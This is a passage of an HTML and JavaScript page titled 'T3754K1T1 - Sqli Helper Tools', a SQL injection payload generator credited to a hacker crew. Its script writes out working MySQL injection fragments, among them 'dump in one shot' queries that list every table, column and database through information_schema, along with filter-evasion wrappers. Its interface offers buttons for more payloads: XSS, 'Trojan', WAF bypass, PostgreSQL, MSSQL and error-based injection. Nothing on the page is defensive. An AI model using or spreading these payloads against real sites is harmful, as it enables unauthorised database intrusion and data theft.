553. document.getElementById('dios').value = hx;
554. }
555.  
556. function cn(){
557. var cn = prompt('Input Your Query','VERSION()');
558. var cn = "convert("+cn+"+using+latin1)";
559. document.getElementById('dios').value = cn;
560. }
561.  
562. function cs(){
563. var cs = prompt('Input Your Query','VERSION()');
564. var cs = "cast("+cs+"+as+char)";
565. document.getElementById('dios').value = cs;
566. }
567.  
568. function cp(){
569. var cp = prompt('Input Your Query','VERSION()');
570. var cp = "uncompress(compress("+cp+")) ";
571. document.getElementById('dios').value = cp;
572. }
573.  
574. function aes(){
575. var aes = prompt('Input Your Query','VERSION()');
576. var aes = "aes_decrypt(aes_encrypt("+aes+",1),1)";
577. document.getElementById('dios').value = aes;
578. }
579.  
580. function tblc(){
581. var tblc = alert("Count Total Tables with Table Name");
582. var tblc = "concat(@c:=0x00,if((select+count(*)+from(information_schema.tables)where+table_schema=database()+and+@c:=concat(@c,0x3c6c693e,@tbl:=table_name,0x203a3a20,(select+count(*)from+information_schema.columns+where+table_Schema=database()+and+table_name=@tbl))),0x00,0x00),@c)";
583. document.getElementById('dios').value = tblc;
584. }
585.  
586. function dbc(){
587. var dbc = alert("Count Total Databases");
588. var dbc = "concat(0x546f74616c20446174616261736573203e3e20,(select+count(*)from+information_schema.schemata))";
589. document.getElementById('dios').value = dbc;
590. }
591.  
592. function tottbl(){
593. var tottbl = alert("Count Total Tables");
594. var tottbl = "concat(0x546f74616c205461626c6573203e3e20,(select+count(*)from+information_schema.tables+where+table_Schema=database()))";
595. document.getElementById('dios').value = tottbl;
596. }
597.  
598. function totcol(){
599. var totcol = alert("Count Total Columns");
600. var totcol = "concat(0x546f74616c20436f6c756d6e73203e3e20,(select+count(*)from+information_schema.columns+where+table_Schema=database()))";
601. document.getElementById('dios').value = totcol;
602. }
603.  
604. function countdb(){
605. var countdb = alert("Count Total Databases with Database Name");
606. var countdb = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)"; document.getElementById('dios').value = countdb;
607. }
608.  
609.  
610.  
611. function about(){
612. var about = alert("Cheatsheet Collection Pakage V.3\n\nBy : Versailles [ Sec7or Team ]\n\nThankz to All Author the queries\n\nI love Mayu Watanabe (Mayuyu AKB48)\n\nGreets :\nM@dbl00d - Minato - Sn00.py - 1DIOT - Sayap Hitam - Penyair - Sanusi - Sohai - i3r_Code - Ajkaro - Zen - Trjnx - Janus - Makman - Kashmiri Cheetah - CodeNinja - UniQue - Cracker Bikash - and All Injector >_<");
613. }
614.  
615.  
616.  
617. </script>
618. </head>
619. <body>
620. <center>
621.  
622. <div class="panel panel-default" style="background:rgba(0,0,0,0.50);width:700px;">
623.  
624. <h1>T3754K1T1 - Sqli Helper Tools</h1>
625.  
626. <br>
627.  
628. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#mc"><i class="glyphicon glyphicon-plus"></i> STRINGS TOOLS </button>
629.  
630. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#q"><i class="glyphicon glyphicon-plus"></i> QUERY </button>
631.  
632.  
633. <div id="mc" class="collapse">
634.  
635. <textarea id="str" rows="5" cols="70" placeholder="Strings"></textarea>
636. <br>
637. <button onclick="Str2Hex()"> Hex </button>
638. <button onclick="Hex2Str()"> Unhex </button>
639. |
640. <input onclick="b64_enc();" type=button value="Base64Enc" name="encode">
641. <input onclick="b64_dec();" type=button value="Base64Dec" name="decode">
642. |
643. <input onclick="esc();" type=button value="Escape" name="encode">
644. <input onclick="unesc();" type=button value="Unescape" name="decode">
645.  
646. <br><br>
647. <input type="text" size="25" id="wrd" placeholder="Words"> >>
648. <input type="text" size="25" id="rep" placeholder="Replace">
649. <input onclick="rplc();" type=button value="Replace All">
650. <br><br>
651.  
652. <textarea id="hex" rows="5" cols="70" placeholder="Output">
653. </textarea><br>
654.  
655. <br>
656.  
657. </div>
658.  
659. <div id="q" class="collapse">
660. <br>
661.  
662. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#query"><i class="glyphicon glyphicon-plus"></i> DIOS QUERY </button>
663.  
664. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#sysvar"><i class="glyphicon glyphicon-plus"></i> SYSTEM VARIABLES </button>
665.  
666. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#otr"><i class="glyphicon glyphicon-plus"></i> OTHER </button>
667.  
668. <br>
669. <div id="query" class="collapse">
670.  
671. <div class="dios">
672. <table class="table table-striped table-bordered table-hover datatable">
673. <tr>
674. <td class="text-center">
675. ======= :: DUMP IN ONE SHOOT :: =======</td>
676. </tr>
677.  
678. <tr><td class="text-center">
679. <button onclick="dios1()">Dios 1</button>
680. <button onclick="dios2()">Dios 2</button>
681. <button onclick="dios3()">Dios 3</button>
682. <button onclick="dios4()">Dios 4</button>
683. <button onclick="xssdios()">XssDios </button>
684. <button onclick="trjn()"> Trojan 1 </button>
685. <button onclick="trjnx()"> Trojan 2 </button>
686. <button onclick="bypsfrm()"> Bypass From </button>
687. </td></tr>
688.  
689. <tr><td class="text-center">
690. <button onclick="postgre()"> Postgre </button>
691. <button onclick="mssql()"> Mssql </button>
692. <button onclick="bof()"> BOF </button>
693. <button onclick="mydios2()"> Mydios 2 </button>
694. <button onclick="makman()"> Makman </button>
695. <button onclick="ebf()"> ErrBased </button>
696. <button onclick="poligon()"> Poligon </button>
697. <button onclick="multipoint()"> Multipoint </button>
698. </td></tr>
699. </table>
700. </div>
701. </div>
702.  
703. <br>
704.  
705. <div id="sysvar" class="collapse">
706.  
707. <div class="sv">
708. <table class="table table-striped table-bordered table-hover datatable">
709. <tr>
710. <td class="text-center">
711. ======= :: SYSTEM VARIABLES :: =======</td>
712. </tr>
713. </table>
714. <table class="table table-striped table-bordered table-hover datatable">
715. <tr><td>VERSION </td><td class="text-center"><button onclick="version1()">Version 1</button>
716. <button onclick="version2()">Version 2</button>
717. <button onclick="version3()">Version 3</button>
718. <button onclick="version4()">Version 4</button>
719. <button onclick="version5()">Version 5</button>
720. </td></tr>
721.  
722. <tr><td>USER </td><td class="text-center"><button onclick="user1()">User 1</button>
723. <button onclick="user2()">User 2</button>
724. <button onclick="user3()">User 3</button>
725. <button onclick="user4()">User 4</button>
726. <button onclick="user5()">User 5</button>
727. <button onclick="user6()">User 6</button></td></tr>
728.  
729. <tr><td>DATABASE </td><td class="text-center"> <button onclick="db1()">Database 1</button>
730. <button onclick="db2()">Database 2</button>
731. <button onclick="db3()">Database 3</button></td></tr>
732. </table>
733. </div>
734.  
735.  
736. <table class="table table-striped table-bordered table-hover datatable">
737. <tr><td class="text-center">
738. <button onclick="o1()"> @@HOSTNAME </button>
739. <button onclick="o2()"> @@VERSION_COMPILE_MACHINE </button>
740. <button onclick="o3()"> @@VERSION_COMPILE_OS </button>
741. </td></tr>
742.  
743. <tr><td class="text-center">
744. <button onclick="o4()"> @@BASEDIR </button>
745. <button onclick="o5()"> @@HV_OPENSSL </button>
746. <button onclick="o6()"> @@HV_SYMLINK </button>
747. <button onclick="o7()"> @@PORT </button>
748. <button onclick="o8()"> @@SOCKET </button>
749. </td></tr>
750. </table>
751.  
752. </div>
753.  
754.  
755.  
756. <div id="otr" class="collapse">
757.  
758. <div class="othr">
759. <table class="table table-striped table-bordered table-hover datatable">
760. <tr>
761. <td class="text-center">
762. ======= :: OTHERS :: =======</td>
763. </tr>
764. </table>
765.  
766. <table class="table table-striped table-bordered table-hover datatable">
767. <tr><td class="text-center">
768. <button onclick="xssqli()"> PopUP </button>
769. <button onclick="kolom()"> Generate Column </button>
770. <button onclick="mydios()"> MyDios </button>
771. <button onclick="hx()"> Hex </button>
772. <button onclick="cn()"> Convert </button>
773. <button onclick="cs()"> Cast </button>
774. <button onclick="cp()"> Compress </button>
775. <button onclick="aes()"> Aes </button>
776. </td></tr>
777.  
778. <tr><td class="text-center">
779. <button onclick="dbc()"> Total Databases </button>
780. <button onclick="tottbl()"> Total Tables </button>
781. <button onclick="totcol()"> Total Columns </button>
782. <button onclick="tblc()"> Total Col </button>
783. <button onclick="countdb()"> Count DB </button>
784. <button onclick="about()"> About </button>
785. </td></tr>
786. </table>
787.  
788. </div></div>
789.  
790. <br>
791. <textarea id="dios" rows="5" cols="70" placeholder="Output">
792. </textarea>
793. <br>
794.  
795. </div>
796. <br>
797.  
798. <hr class="hr">
799.  
800. <style>
801. @import url(http://fonts.googleapis.com/css?family=Great+Vibes);
802. @import url(http://fonts.googleapis.com/css?family=Inconsolata);
803. @import url(http://fonts.googleapis.com/css?family=Geo);
804. h1 {
805. color: lime;
806. font-weight: bold;
807. font-family: 'Great Vibes', cursive;
808. }
809. textarea {
810. background: rgba(0,0,0,0.13);
811. color: lime;
812. border: 1px solid red;
813. font-family: 'Inconsolata', cursive;
814. }
815. button {
816. border: 1px solid lime;
817. background: black;
818. color: white;
819. font-family: 'Geo', cursive;
820. }
821. #copy {
822. color: red;
823. font-weight: bold;
824. font-family: 'Inconsolata', cursive;
825. }
826. #copy a {
827. color: white;
828. }
829. #copy a:hover {
830. color: blue;
831. }
832. .text-center {
833. color: red;
834. background: rgba(0,0,0,0.99);
835. font-family: 'Inconsolata', cursive;
836. }
837. tr {
838. border: 2px solid black;
839. color: lime;
840. font-family: 'Inconsolata', cursive;
841. }
842. input {
843. background: black;
844. color: white;
845. border: 1px solid lime;
846. font-family: 'Geo', cursive;
847. }
848. td {
849. background: black;
850. font-family: 'Geo', cursive;
851. }
852. </style>
853.  
854. </div>
855. </body>
856. </html>